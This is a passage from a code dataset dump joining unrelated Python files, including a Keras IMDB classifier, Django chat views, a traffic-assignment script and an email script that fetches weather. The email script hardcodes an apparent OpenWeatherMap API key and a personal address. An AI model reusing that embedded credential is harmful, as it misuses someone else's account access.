main()\n","sub_path":"full_mode_rx/TX/FIFO/fifo_prueba/fifo_sim.py","file_name":"fifo_sim.py","file_ext":"py","file_size_in_byte":4804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"634814288","text":"from setuptools import setup, find_packages\nfrom os import path\n\npackageName = \"pygeomesh\"\n\nthis_directory = path.abspath(path.dirname(__file__))\n\n# Get the long description from the README file\nwith open(path.join(this_directory, \"README.md\"), encoding=\"utf-8\") as f:\n long_description = f.read()\n\n# version scheme: major.minor.patch\nversionInfo = 0, 1, 1\n\n__version__ = \".\".join(map(str, versionInfo))\n\n\nsetup(\n name=packageName,\n version=__version__,\n author=\"PuQing\",\n author_email=\"me@puqing.work\",\n packages=find_packages(),\n description=\"PyGeomesh is a tool for generating discretized points from geometry.\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/AndPuQing/PyGeomesh\",\n download_url=\"https://pypi.python.org/pypi/pygeomesh\",\n license=\"Apache License 2.0\",\n platforms=\"any\",\n requires=[\n \"numpy\",\n \"scipy\",\n \"matplotlib\",\n ],\n classifiers=[\n \"Development Status :: 4 - Beta\",\n \"License :: OSI Approved :: Apache Software License\",\n \"Intended Audience :: Science/Research\",\n \"Operating System :: OS Independent\",\n \"Programming Language :: Python :: 3\",\n \"Topic :: Scientific/Engineering :: Mathematics\",\n ],\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"173490544","text":"import numpy as np\nfrom keras.datasets import imdb\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.layers import Flatten\nfrom keras.layers.embeddings import Embedding\nfrom keras.preprocessing import sequence\n\nseed = 7\n\nnp.random.seed(seed)\n\ntop_words = 5000\n(X_train, Y_train), (X_test, Y_test) = imdb.load_data(num_words = top_words)\n\nmax_words = 500\nX_train = sequence.pad_sequences(X_train, maxlen = max_words)\nX_test = sequence.pad_sequences(X_test, maxlen = max_words)\n\nmode = Sequential()\nmode.add(Embedding(top_words,32,input_length=max_words))\nmode.add(Flatten())\nmode.add(Dense(250,activation='relu')) #rectifier activation fn f(X) = max(0,X)\nmode.add(Dense(1,activation='sigmoid'))\n\nmode.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])\n# sgd - Stochastic gradient descent optimizer. accuracy = 50% while adam has an accuracy of 86%\n\nprint(mode.summary())\n\nmode.fit(X_train,Y_train, validation_data=(X_test,Y_test),epochs=5, batch_size=128, verbose=1)\n\nprint(\"\\n\\nbeginning the Training process\\n\\n\")\n\nscores = mode.evaluate(X_test, Y_test, verbose=1)\n\n#verbose =0 for no logging, =1 for progress bar logging and =2 for one line logging per epoch\nprint(\"Accuracy %f%%\"%(scores[1]*100))\n\n\n# learning rate for adam is 0.001\n# learning rate decay over each update is 0. ie learning rate remains the same for all the epochs\n","sub_path":"softcomputing/movies.py","file_name":"movies.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"20912587","text":"#!/usr/bin/python3\n\n# Dependency : sortedcontainers\n# - installation: pip install sortedcontainers\n# Everything else should be in the standard library\n# Tested on cpython 3.4.3\n\nfrom enum import Enum, unique\nfrom sortedcontainers import SortedSet\nimport argparse\nimport re\nimport csv\nimport sys\nimport datetime\nimport random\n\nclass Job:\n\tdef __init__(self,\n\t job_id,\n\t nb_res,\n\t wait_time,\n\t run_time,\n\t submit_time,\n\t wall_time):\n\t\tself.job_id = job_id\n\t\tself.nb_res = nb_res\n\t\tself.wait_time = wait_time\n\t\tself.run_time = run_time\n\t\tself.submit_time = submit_time\n\t\tself.wall_time = wall_time\n\n\t\tself.start_time = self.submit_time + self.wait_time\n\t\tself.finish_time = self.start_time + self.run_time\n\t\tself.turnaround_time = self.finish_time - self.submit_time\n\t\tself.stretch = self.turnaround_time / self.nb_res\n\n\t\tself.resources = SortedSet()\n\ndef take_first_resources(available_res, nb_res_to_take):\n\tassert(len(available_res) >= nb_res_to_take), 'Invalid schedule. Want to use {} resources whereas only {} are available ({})'.format(\n\t\tnb_res_to_take, len(available_res), available_res)\n\tallocation = SortedSet()\n\tl = list(available_res)\n\n\tfor i in range(nb_res_to_take):\n\t\tallocation.add(l[i])\n\n\tavailable_res.difference_update(allocation)\n\n\tif len(available_res) > 0:\n\t\tmin_available_res = min(available_res)\n\t\tfor res in allocation:\n\t\t\tassert(res < min_available_res), \"Invalid sort\"\n\n\treturn (available_res, allocation)\n\n@unique\nclass SwfField(Enum):\n\tJOB_ID=1\n\tSUBMIT_TIME=2\n\tWAIT_TIME=3\n\tRUN_TIME=4\n\tALLOCATED_PROCESSOR_COUNT=5\n\tAVERAGE_CPU_TIME_USED=6\n\tUSED_MEMORY=7\n\tREQUESTED_NUMBER_OF_PROCESSORS=8\n\tREQUESTED_TIME=9\n\tREQUESTED_MEMORY=10\n\tSTATUS=11\n\tUSER_ID=12\n\tGROUP_ID=13\n\tAPPLICATION_ID=14\n\tQUEUD_ID=15\n\tPARTITION_ID=16\n\tPRECEDING_JOB_ID=17\n\tTHINK_TIME_FROM_PRECEDING_JOB=18\n\nparser = argparse.ArgumentParser(description='Reads a CSV Batsim jobs output file and transforms it into a SWF (Standard Workload Format) file')\nparser.add_argument('inputCSV', type=argparse.FileType('r'), help='The input CSV file')\nparser.add_argument('outputSWF', type=argparse.FileType('w'), help='The output SWF file')\n\nargs = parser.parse_args()\n\n#######################\n# Input CSV traversal #\n#######################\njobs = {}\nreader = csv.DictReader(args.inputCSV)\n\nfor row in reader:\n\tjob_id = int(row[\"job_id\"])\n\tsubmit_time = float(row[\"submission_time\"])\n\tnb_res = int(row[\"requested_number_of_processors\"])\n\twall_time = float(row[\"requested_time\"])\n\trun_time = float(row[\"execution_time\"])\n\twait_time = float(row[\"waiting_time\"])\n\n\tsuccess = bool(int(row[\"success\"]) == 1)\n\n\tif success and (nb_res > 0):\n\t\tjob = Job(job_id = job_id,\n\t nb_res = nb_res,\n\t wait_time = wait_time,\n\t run_time = run_time,\n\t submit_time = submit_time,\n\t wall_time = wall_time)\n\n\t\tjobs[job_id] = job\n\n#####################\n# Output SWF export #\n#####################\n\nwriter = csv.DictWriter(args.outputSWF,\n delimiter = ' ',\n fieldnames = ['job_id',\n 'submit_time',\n 'wait_time',\n 'run_time',\n 'nb_res_used',\n 'avg_cputime',\n 'used_memory',\n 'nb_res_requested',\n 'walltime',\n 'requested_memory',\n 'status',\n 'user_id',\n 'group_id',\n 'exec_id',\n 'queue_id',\n 'partition_id',\n 'preceding_job_id',\n 'think_time_from_preceding_job'])\n\nfor job_id in jobs:\n\tjob = jobs[job_id]\n\n\td = {'job_id' : job.job_id,\n 'submit_time' : job.submit_time,\n 'wait_time' : job.wait_time,\n 'run_time' : job.run_time,\n 'nb_res_used' : job.nb_res,\n 'avg_cputime' : -1,\n 'used_memory' : -1,\n 'nb_res_requested' : job.nb_res,\n 'walltime' : job.wall_time,\n 'requested_memory' : -1,\n 'status' : 1,\n 'user_id' : -1,\n 'group_id' : -1,\n 'exec_id' : -1,\n 'queue_id' : -1,\n 'partition_id' : -1,\n 'preceding_job_id' : -1,\n 'think_time_from_preceding_job' : -1}\n\n\twriter.writerow(d)\n","sub_path":"tools/batsim_output_csv_to_swf.py","file_name":"batsim_output_csv_to_swf.py","file_ext":"py","file_size_in_byte":4682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"553070028","text":"name= input(\"Enter your name:\")\nage=int(input(\"Enter your age:\"))\ninFuture=((2021-age)+100)\n \n\nprint(\"Hello,\" +name+ \" you are \" +str(age)+ \" years old\" + \" You will be 100 years in \" +str(inFuture))\n\n\naPerson= input(\"Do you love me?(Enter yes or no)\")\nanswer=\"yes\"\n\nif answer==\"yes\":\n print(\"Me too!\")\nelse:\n print(\"Iriz what iriz.\")","sub_path":"practice.py","file_name":"practice.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"275412262","text":"from django.shortcuts import render, get_object_or_404\nfrom django.template.loader import render_to_string\nfrom django.urls import reverse\nfrom django.http import HttpResponseRedirect, HttpResponse, Http404, JsonResponse, QueryDict, HttpRequest\nfrom django.contrib.auth.decorators import login_required\nfrom UserProfile.models import UserExt, save_attach\nfrom .models import Chat, Message, Member, MessageAttachment\nfrom UserProfile.forms import AttachmentForm\nfrom .forms import MessageForm, ChatForm, ChatMember\nfrom django.utils.safestring import mark_safe\nimport json\nfrom datetime import datetime\nfrom Lib.FileFormats import handle_uploaded_file\n\n\ndef add_members(request, chat_slug):\n context = {\n 'status': 'success',\n }\n chat = get_object_or_404(Chat, slug=chat_slug)\n if not chat.is_creator(request.user):\n return Http404\n # fix this\n\n if request.method == 'POST':\n members_form = ChatMember(request.POST)\n if members_form.is_valid():\n members_list = members_form.cleaned_data['members']\n\n for member in members_list:\n if not chat.member_set.filter(user=member):\n new_member = Member(chat=chat, user=member)\n new_member.save()\n else:\n context['status'] = 'error'\n\n return JsonResponse(context)\n else:\n members_form = ChatMember()\n\n context['members_form'] = members_form\n\n return render(request, 'Chat/chat_member_form.html', context)\n\n\ndef create_conversation(request):\n context = {\n 'status': 'success',\n }\n path = request.META['HTTP_REFERER']\n from_house = path.find('/house/')\n from_user = path.find('/user/')\n\n redirect = False\n if from_house > 0 or from_user > 0:\n redirect = True\n print(redirect)\n\n if request.method == 'POST':\n members_form = ChatMember(request.POST)\n if members_form.is_valid():\n print('created')\n try:\n opponent = UserExt.objects.get(username=request.POST['members'])\n user = request.user\n\n chat = Chat.chat_objects.has_conversation(user, opponent)\n\n if not chat:\n chat_name = \"%s|%s\" % (user.username, opponent.username)\n chat = Chat(name=chat_name, chat_type=Chat.P2P)\n chat.save()\n\n member1 = Member(chat=chat, user=opponent)\n member2 = Member(chat=chat, user=user)\n\n member1.save()\n member2.save()\n context['mini_chat'] = render_to_string('Chat/chat_mini_block.html',\n {'chat': chat})\n context['slug'] = chat.slug\n\n\n except UserExt.DoesNotExist:\n context['status'] = 'user_not_exit'\n else:\n print(members_form.errors)\n\n if redirect:\n print(reverse('chat.page'))\n return HttpResponseRedirect(reverse('chat.page') + \"#\" + chat.slug)\n return JsonResponse(context)\n else:\n members_form = ChatMember()\n\n context['members_form'] = members_form\n context['conversation'] = True\n\n return render(request, 'Chat/chat_member_form.html', context)\n\n\ndef create_chat(request):\n context = {\n 'status': 'success',\n }\n exs_chat = None\n if 'chat_slug' in request.GET:\n try:\n exs_chat = Chat.objects.get(slug=request.GET['chat_slug'])\n except Chat.DoesNotExist:\n exs_chat = None\n\n user = UserExt.objects.get(id=request.user.id)\n if request.method == 'POST':\n chat_form = ChatForm(request.POST, request.FILES)\n\n if chat_form.is_valid():\n if exs_chat:\n chat = chat_form.save(exs_chat)\n else:\n chat = chat_form.save()\n member = Member(chat=chat, user=user, status=Member.CREATOR)\n member.save()\n print(chat)\n chat.title = chat.get_chat_title(user)\n context['mini_chat'] = render_to_string('Chat/chat_mini_block.html',\n {'chat': chat})\n context['slug'] = chat.slug\n\n return JsonResponse(context)\n\n else:\n if exs_chat:\n chat_form = ChatForm(initial={'name': exs_chat.name,\n 'chat_type': exs_chat.chat_type})\n else:\n chat_form = ChatForm()\n\n context['chat_form'] = chat_form\n context['is_creating'] = True\n return render(request, 'Chat/chat_create_form.html', context)\n\n\ndef get_user(request):\n if 'q' in request.GET:\n\n try:\n user = UserExt.objects.filter(username=request.GET['q']).values('username', 'id')[0]\n user_data = []\n user_data.append({'name': user['username']})\n user_data.append({'id': user['id']})\n return JsonResponse({'user_data': user_data})\n except IndexError:\n return HttpResponse('none')\n\n\ndef load_users(request):\n if 'q' in request.GET:\n\n users = UserExt.objects.filter(username__istartswith=request.GET['q']).values('username')\n users_list = []\n for user in users:\n if user['username'] != request.user.username:\n users_list.append({'name': user['username']})\n return JsonResponse({'users_list': users_list})\n return HttpResponse('uncorrected request')\n\n\n@login_required\ndef chat_list(request):\n\n user = UserExt.objects.get(id=request.user.id)\n chats = Chat.chat_objects.users_chats(user.id).order_by(\"name\")\n print(open)\n chats_list = []\n for chat in chats:\n chat.user_new_message = chat.has_new_messages(user)\n chat.image = chat.get_image(user)\n chat.title = chat.get_chat_title(user)\n chats_list.append(chat)\n\n context = {\n 'chats': chats_list,\n }\n return render(request, 'Chat/chats_page.html', context)\n\n\ndef chat_block(request, chat_slug):\n user = UserExt.objects.get(id=request.user.id)\n chat = get_object_or_404(Chat, slug=chat_slug)\n\n try:\n member = chat.member_set.get(user=user)\n except Chat.DoesNotExist:\n return Http404\n\n if 'since' in request.GET:\n date_since = datetime.strptime(request.GET['since'], '%d-%m-%Y %H:%M')\n messages = Message.message_object.last_10_messages(chat, date_since)\n\n return render(request, 'Chat/messages_list.html', {'messages': messages})\n\n messages = Message.objects.filter(chat=chat).order_by('-date')[0:10]\n chat_title = member.user_chat_title()\n context = {\n 'chat': chat,\n 'messages': messages,\n 'members_form': ChatMember(),\n 'chat_title': chat_title,\n\n }\n if chat.is_creator(user):\n context['creator'] = True\n return render(request, 'Chat/chat_block.html', context)\n\n\ndef create_message(request):\n\n user = UserExt.objects.get(id=request.user.id)\n\n print(request.POST)\n print(request.FILES)\n errors_file_type = []\n\n if request.method == 'POST':\n\n chat = get_object_or_404(Chat, slug=request.POST['chat_slug'])\n\n form_message = MessageForm(request.POST)\n form_attach = AttachmentForm(request.FILES)\n\n if form_message.is_valid():\n errors_file_type = (handle_uploaded_file(request.FILES))\n if not len(form_message.cleaned_data['text']) and not (len(request.FILES)):\n errors_file_type.append('empty')\n else:\n message = form_message.save(user, chat)\n save_attach(request.FILES, message, MessageAttachment)\n\n return JsonResponse({'message': message.id})\n else:\n form_message = MessageForm()\n form_attach = AttachmentForm()\n\n return render(request, 'Chat/form_message_block.html', {\n 'form_message': form_message,\n 'form_attach': form_attach,\n 'errors_file_type': errors_file_type\n })\n\n\ndef chat_delete(request):\n if request.POST:\n try:\n chat = Chat.objects.get(slug=request.POST['chat_slug'])\n member = chat.member_set.filter(user=request.user)\n if member:\n member.delete()\n except Chat.DoesNotExist:\n return JsonResponse({'error': \"chat isn't exist\"})\n\n return JsonResponse({'deleted': \"success\"})\n","sub_path":"Chat/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"520458627","text":"import requests\nimport smtplib\n\n\ndef get_emails():\n emails = {}\n email_file = \"\"\n try:\n email_file = open('emails.txt', 'r')\n\n for line in email_file:\n email, name = line.split(',')\n emails[email] = name.strip()\n except FileNotFoundError as err:\n print(err)\n\n return emails\n\n\ndef get_schedule():\n schedule = None\n try:\n schedule_file = open('schedule.txt', 'r')\n schedule = schedule_file.read()\n except FileNotFoundError as err:\n print(err)\n\n return schedule\n\n\ndef get_weather():\n url = 'http://api.openweathermap.org/data/2.5/find?q=Chicago&units=imperial&appid=fba15d720616ae163a79b35c5d143717'\n r = requests.get(url)\n json = r.json()\n\n if len(json['list']) > 0:\n description = json['list'][0]['weather'][0]['description']\n temp_min = json['list'][0]['main']['temp_min']\n temp_max = json['list'][0]['main']['temp_max']\n else:\n description = json['weather'][0]['description']\n temp_min = json['main']['temp_min']\n temp_max = json['main']['temp_max']\n\n forecast = \"The weather for today is {0} with a high of {1} and a low of {2}.\".format(description,\n int(temp_max),\n int(temp_min))\n\n return forecast\n\n\ndef send_email(emails, schedule, forecast):\n sender = 'johnnyk737@gmail.com'\n receiver = 'johnnyk737@gmail.com'\n\n\n smtpObj = smtplib.SMTP('smtp.gmail.com', '587', timeout=60)\n #smtpObj.set_debuglevel(True)\n smtpObj.starttls()\n password = input(\"What is your password? \")\n smtpObj.login('johnnyk737', password)\n\n #send email to entire list\n\n for to_email, name in emails.items():\n message = 'Subject: Welcome to the Circus!\\n'\n message += 'Hi {0},\\n\\n'.format(name)\n message += forecast + '\\n\\n'\n message += schedule + '\\n\\n'\n message += 'Hope to see you there!'\n smtpObj.sendmail(sender, to_email, message)\n\n\n smtpObj.quit()\n print(\"email sent\")\n return message\n\n\ndef main():\n emails = get_emails()\n\n sched = get_schedule()\n\n forecast = get_weather()\n\n print(send_email(emails, sched, forecast))\n\n\nmain()\n","sub_path":"Emailer/emailer.py","file_name":"emailer.py","file_ext":"py","file_size_in_byte":2332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"578478220","text":"#!/usr/bin/env python\n###############################################################################\n#\n# cext_traffic_assign.py - traffic assignment by greedy method\n#\n# File: cext_traffic_assign.py\n# Author: Alex Stivala\n# Created: March 2011\n#\n# OBSOLETE - use C implementation in tap/ now\n#\n# $Id: cext_traffic_assign.py 641 2011-09-01 01:40:52Z astivala $\n# \n###############################################################################\n\n\"\"\"\nTraffic assignment by greedy algorithm.\n\nThis implementation uses a python extension written in C\n(from ../python_extension/) to do\nDijkstra's algorithm to make it faster (since > 90% of time is spent\ndoing shortest path computations).\n\n\nOBSOLETE - not using this any more, using cext_pape_traffic_assign.py\ninstead after finding overhead of C/Python interface too great (fixed\nthis by converting to internal C data structure earlier in cext_pape)\n\"\"\"\n\nimport sys,os\nfrom time import strftime,localtime,clock\nfrom math import ceil,floor\n\nfrom cdijkstra import dijkstra\nfrom parsetapfiles import *\n\n\n\n#-----------------------------------------------------------------------------\n#\n# Constants\n#\n#-----------------------------------------------------------------------------\n\n# steps in cost step function\nNUM_STEPS = 3.0\n\n\n#-----------------------------------------------------------------------------\n#\n# Function definitions\n#\n#-----------------------------------------------------------------------------\n\ndef total_link_cost(net):\n \"\"\"\n Compute the total of link costs (volume * costfunction(volume))\n over all links at current volumes on those links\n\n Parameters:\n net - Net object as returned by parse_net_file()\n\n Return value:\n total link cost\n \"\"\"\n return sum([link.volume * link.cost for link in net.links])\n\ndef cost_step(link, volume):\n \"\"\"\n Given a Link object and volume on that link, return the step\n (in the division of volume up to capacity) that the volume is at\n step function at that volume\n\n Parameters:\n link - Link object\n volume- volume to get cost for on link\n\n Return value:\n step (0, 1, .. NUM_STEPS) that the volume is at on that link\n \"\"\"\n if volume >= link.capacity:\n return NUM_STEPS\n flowstepsize = link.capacity / NUM_STEPS\n step = floor(volume / flowstepsize)\n return step\n\ndef distance_from_next_step(link):\n \"\"\"\n Given a Link object return the distance (volume difference) from\n the point where it will go up to the next step in the step cost function\n\n Parameters:\n link - Link object\n\n Return value:\n distance (additional volume required) to go to next step in cost step fn\n \"\"\"\n flowstepsize = link.capacity / NUM_STEPS\n if link.volume == 0.0:\n return flowstepsize\n elif link.volume >= link.capacity:\n return float(\"inf\")\n next_step = ceil(link.volume / flowstepsize)\n next_step_vol = next_step * flowstepsize\n if next_step_vol == link.volume:\n return next_step_vol\n else:\n return next_step_vol - link.volume\n \ndef cost_step_function(link, volume):\n \"\"\"\n Given a Link object and volume on that link, return the value of cost\n step function at that volume\n\n Parameters:\n link - Link object\n volume- volume to get cost for on link\n\n Return value:\n cost at volume on link\n \"\"\"\n step = cost_step(link, volume)\n coststepsize = 2.0 # FIXME \n if volume > link.capacity:\n cost = link.free_flow_time + step * coststepsize # TODO something else?\n else:\n cost = link.free_flow_time + step * coststepsize\n\n return cost\n \n\n\ndef get_shortest_path(pred, orig, dest):\n \"\"\"\n Get the shortest path to dest given the predecessor list pred\n from Dijkstra's algorithm\n\n Parameters:\n pred - list of predecessor nodes from Dijkstra's algorithm with orig \n as source\n source - source node\n dest - destinatino node\n\n Return value:\n list of nodes on shortest path to dest from orig\n \"\"\"\n path = []\n v = dest\n while v != orig:\n # if v == -1:\n # break\n path.append(v)\n v = pred[v]\n path.append(orig)\n path.reverse()\n return path\n\n\ndef assign(net, demands, demandsdict, linkdict):\n \"\"\"\n Assign flow from O-D demands to links according to current shortest\n paths (lowest costs) on netgraph\n Assigns flow to path only up to the amount of flow that\n takes the first link to do so up to the next step in cost function,\n subtracting that assigned flow from the O-D demand using that path\n\n Parameters:\n net - Net object as returned by parse_net_file()\n demands (in/out) - dict of dicts { origin : { destination : demand } }\n from parse_trips_file()\n demandsict (in/out) - O-D demand data represented as {(orig,dest):demand}\n from demands_to_demands_dict(demands)\n linkdict (in/out) - dict {(from,to):Link} of Link objects with volume\n attribute assigned according to shortest paths\n\n\n Return value:\n \"\"\"\n netgraph = net_to_graph(net)\n for (orig, demand_dict) in demands.iteritems():\n# sys.stderr.write(\"running dijjkstra for orig %d...\" % orig)\n t0 = clock()\n pred = dijkstra(netgraph, net.num_nodes+1, orig)\n t1 = clock()\n# sys.stderr.write(\"done (%f ms).\\n\" % ((t1 - t0)*1000))\n for (dest, routeflow) in demand_dict.iteritems():\n if orig == dest or routeflow == 0.0:\n continue\n pathnodes = get_shortest_path(pred, orig, dest)\n if len(pathnodes) < 2:\n continue\n path = zip(pathnodes, pathnodes[1:]) #convert to list of edge tuples\n path_links = [linkdict[from_to_tuple] for from_to_tuple in path]\n # assign flow to path only up to the amount of flow that\n # takes the first link to do so up to the next step in cost function\n addflow = min(routeflow,\n min([distance_from_next_step(link) for link in path_links]))\n for link in path_links:\n link.volume += addflow\n demandsdict[(orig, dest)] -= addflow\n demand_dict[dest] -= addflow \n\n\ndef update_link_costs(net):\n \"\"\"\n Update the cost element in each Link with using cost step function\n and volume\n \"\"\"\n for link in net.links:\n link.cost = cost_step_function(link, link.volume)\n\n\ndef print_flow(fh, net, linkdict):\n \"\"\"\n Output the flow data giving volume and cost from output of traffic assign\n \n Paraemters:\n fh - open (write) filehande to write flow data to\n net - Net object as returned by parse_net_file()\n linkdict - dict {(from,to):Link} of Link objects with volume\n attribute assigned according to shortest paths\n\n Return value:\n None.\n\n Output volume and cost on each link in format like:\n\n 25\n 76\n \n\n ~ Tail Head : Volume Cost ;\n 1 2 : 4494.5008499645437041 6.0008161234622576785 ;\n 1 3 : 8119.1900669362912595 4.0086912217072878661 \n\n \"\"\"\n assert(net.num_links == len(list(linkdict.iterkeys())))\n fh.write(\"\\t%d\\n\" % net.num_nodes)\n fh.write(\"\\t%d\\n\" % net.num_links)\n fh.write(\"\\n\")\n fh.write(\"\\n\\n\")\n fh.write(\"~\\tTail\\tHead\\t:\\tVolume\\tCost\\t;\\n\")\n\n # sort by fromNode then toNode for output\n linklist = list(linkdict.iteritems())\n linklist.sort()\n\n for ((nfrom, nto), link) in linklist:\n assert(link.init_node == nfrom)\n assert(link.term_node == nto)\n fh.write(\"\\t%d\\t%d\\t:\\t%f\\t%f\\t;\\n\" %\n (link.init_node, link.term_node, link.volume, link.cost))\n \n \n#-----------------------------------------------------------------------------\n#\n# Main\n#\n#-----------------------------------------------------------------------------\n \ndef usage(progname):\n \"\"\"\n Print usage message and exit\n \"\"\"\n \n sys.stderr.write(\"Usage: \" +progname + \" netfilename demandfilename\\n\")\n sys.exit(1)\n\n\ndef main():\n \"\"\"\n main for cext_traffic_assign.py\n\n Usage: cext_traffic_assign.py netfilename demandfilename\n\n netfilename is name of the net file defining node and links\n demandfilename is name of Origin-Destination demand file\n\n Output is link flows on stdout.\n \n Example usage:\n \n cext_traffic_assign.py SiouxFalls_net.txt SiouxFalls_trips.txt\n \n \"\"\"\n if len(sys.argv) != 3:\n usage(os.path.basename(sys.argv[0]))\n\n netfilename = sys.argv[1]\n demandfilename = sys.argv[2]\n\n net = parse_net_file(netfilename)\n demands = parse_trips_file(demandfilename)\n\n linkdict = net_to_linkdict(net)\n demandsdict = demands_to_demanddict(demands)\n\n total_od_flow = sum(demandsdict.itervalues())\n sys.stderr.write(\"total OD flow = %f\\n\" % total_od_flow)\n\n voldict = dict({ ((link.init_node, link.term_node), link.volume)\n for link in net.links})\n\n iternum = 0\n while max(demandsdict.itervalues()) > 0.0:\n\n old_voldict = dict(voldict)\n assign(net, demands, demandsdict, linkdict)\n update_link_costs(net)\n \n voldict = dict( [((link.init_node, link.term_node), link.volume)\n for link in net.links])\n\n iternum += 1\n\n delta_link_vol =dict([((link.init_node, link.term_node),\n voldict[(link.init_node, link.term_node)]\n - old_voldict[(link.init_node, link.term_node)])\n for link in net.links])\n delta_link_costs = [ delta_link_vol[(link.init_node, link.term_node)]\n * link.volume for link in net.links ]\n \n avg_excess_cost = sum(delta_link_costs) / total_od_flow\n\n sys.stderr.write(\"iter = %d total unsatisfied demand = %f avg excess cost = %f\\n\" % \n (iternum, sum(demandsdict.itervalues()),\n avg_excess_cost))\n\n\n\n \n print_flow(sys.stdout, net, linkdict)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"trunk/scripts/cext_traffic_assign.py","file_name":"cext_traffic_assign.py","file_ext":"py","file_size_in_byte":10397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"361030065","text":"import os\nimport sys\n_PATH_ = os.path.dirname(os.path.dirname(__file__))\n\nif _PATH_ not in sys.path:\n sys.path.append(_PATH_)\n\nimport argh\n\nfrom utils.load_data_sets import *\n\n\n# Credit: Brain Lee\n\n# this method doesn't read .sgf recursively from a folder to subfolder\n# make sure dataset looks like this:\n# --|-folder1/.sgfs\n# |-folder2/.sgfs\n# ...\n# |-folderN/.sgfs\ndef preprocess(*data_sets, processed_dir=\"processed_data\"):\n processed_dir = os.path.join(os.getcwd(), processed_dir)\n if not os.path.isdir(processed_dir):\n os.mkdir(processed_dir)\n \n '''\n test_chunk, training_chunks = parse_data_sets(*data_sets)\n print(\"Allocating %s positions as test; remainder as training\" % len(test_chunk), file=sys.stderr)\n\n print(\"Writing test chunk\")\n test_dataset = DataSet.from_positions_w_context(test_chunk, is_test=True)\n test_filename = os.path.join(processed_dir, \"test.chunk.gz\")\n test_dataset.write(test_filename)\n test_dataset = None\n\n training_datasets = map(DataSet.from_positions_w_context, training_chunks)\n for i, train_dataset in enumerate(training_datasets):\n if i % 10 == 0:\n print(\"Writing training chunk %s\" % i)\n train_filename = os.path.join(processed_dir, \"train%s.chunk.gz\" % i)\n train_dataset.write(train_filename)\n print(\"%s chunks written\" % (i+1))'''\n \n sgf_files = list(find_sgf_files(*data_sets))\n print(\"%s sgfs found.\" % len(sgf_files), file=sys.stderr)\n est_num_positions = len(sgf_files) * 200 # about 200 moves per game\n positions_w_context = itertools.chain(*map(get_positions_from_sgf, sgf_files))\n \n positions_w_context = list(positions_w_context)\n test_size = 10**5\n \n print(\"Writing test chunk\")\n test_dataset = DataSet.from_positions_w_context(positions_w_context[:test_size], is_test=True)\n test_filename = os.path.join(processed_dir, \"test.chunk.gz\")\n test_dataset.write(test_filename)\n \n print(\"Writing train chunk\")\n test_dataset = DataSet.from_positions_w_context(positions_w_context[test_size:], is_test=False)\n test_filename = os.path.join(processed_dir, \"train0.chunk.gz\")\n test_dataset.write(test_filename)\n test_dataset = None\n\n\nif __name__==\"__main__\":\n\n p = argh.ArghParser()\n p.add_commands([preprocess])\n p.dispatch()\n","sub_path":"preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":2327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"526452693","text":"from typing import Dict\n\nfrom graph_db.engine.types import *\nfrom graph_db.engine.types import DB_TYPE\nfrom .record import Record\n\n\nclass RecordDecoder:\n @staticmethod\n def decode_node_record(record: Record) -> Dict[str, DB_TYPE]:\n \"\"\"\n Decodes node data from a physical node record.\n Node record format:\n 1 byte `in_use` byte\n 4 bytes `label_id` – pointer to record with label in label storage\n 4 bytes `first_rel_id` – pointer to record with first relationship\n 4 bytes `first_prop_id` – pointer to record with first property\n Total: 13 bytes\n :param record: record object\n :return: a dictionary with parsed node data\n \"\"\"\n idx = record.idx\n assert idx >= 0\n\n used = RecordDecoder._decode_bool(record[:1])\n\n label_id = RecordDecoder._decode_int(record[1:5])\n assert label_id >= 0\n\n first_rel_id = RecordDecoder._decode_int(record[5:9])\n first_prop_id = RecordDecoder._decode_int(record[9:13])\n\n return {'id': idx,\n 'used': used,\n 'label_id': label_id,\n 'first_rel_id': first_rel_id,\n 'first_prop_id': first_prop_id}\n\n @staticmethod\n def decode_relationship_record(record: Record) -> Dict[str, DB_TYPE]:\n \"\"\"\n Decodes relationship data from a physical relationship record.\n Relationship record format:\n 1 byte `in_use` byte\n 4 bytes `start_node` - pointer to record with start node of the relationship\n 4 bytes `end_node` – pointer to record with end node of the relationship\n 4 bytes `label_id` – pointer to record with relationship type in label storage\n 4 bytes `start_prev_id` – pointer to record with prev relationship of start node\n 4 bytes `start_next_id` – pointer to record with next relationship of start node\n 4 bytes `end_prev_id` – pointer to record with prev relationship of end node\n 4 bytes `end_next_id` – pointer to record with next relationship of end node\n 4 bytes `first_prop_id` – pointer to record with first property\n Total: 33 bytes\n :param record: record object\n :return: a dictionary with parsed relationship data\n \"\"\"\n idx = record.idx\n assert idx >= 0\n\n used = RecordDecoder._decode_bool(record[:1])\n start_node = RecordDecoder._decode_int(record[1:5])\n end_node = RecordDecoder._decode_int(record[5:9])\n\n label_id = RecordDecoder._decode_int(record[9:13])\n assert label_id >= 0\n\n start_prev_id = RecordDecoder._decode_int(record[13:17])\n start_next_id = RecordDecoder._decode_int(record[17:21])\n end_prev_id = RecordDecoder._decode_int(record[21:25])\n end_next_id = RecordDecoder._decode_int(record[25:29])\n first_prop_id = RecordDecoder._decode_int(record[29:33])\n\n return {'id': idx,\n 'used': used,\n 'start_node': start_node,\n 'end_node': end_node,\n 'label_id': label_id,\n 'start_prev_id': start_prev_id,\n 'start_next_id': start_next_id,\n 'end_prev_id': end_prev_id,\n 